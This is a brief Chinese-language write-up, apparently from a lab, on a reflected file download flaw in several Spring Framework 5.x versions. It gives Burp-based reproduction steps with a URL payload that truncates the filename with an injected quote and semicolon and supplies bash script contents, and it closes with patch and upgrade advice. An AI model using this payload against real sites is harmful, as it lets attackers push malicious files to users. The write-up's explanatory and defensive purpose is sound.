漏洞描述:
Spring是一个Java/Java EE/.NET的分层应用程序框架。在Spring Framework 5.2.0-5.2.2、5.1.0-5.1.12、5.0.0-5.0.15版本中存在反射型文件下载漏洞 。
此漏洞由于Spring Framework并没有对filename传入的文件名进行严格的安全检测,攻击者可以通过截断的方式控制filename变量值,下载任意格式的文件。
复现过程:
1.访问http://ip:port,出现如下页面,开始实验
2.通过burp进行抓包,修改get请求,获取
/?filename=sample.sh%22%3b&contents=%23!%2Fbin%2Fbash%0Awhoami
3.下载文件,通过拦截get请求,修改完数据后,再放包
/?filename=sample.sh%22%3b&contents=%23!%2Fbin%2Fbash%0Awhoami
借此漏洞,攻击者可以控制用户下载的文件名和文件内容。
修复建议:
- 打补丁。
- 升级版本。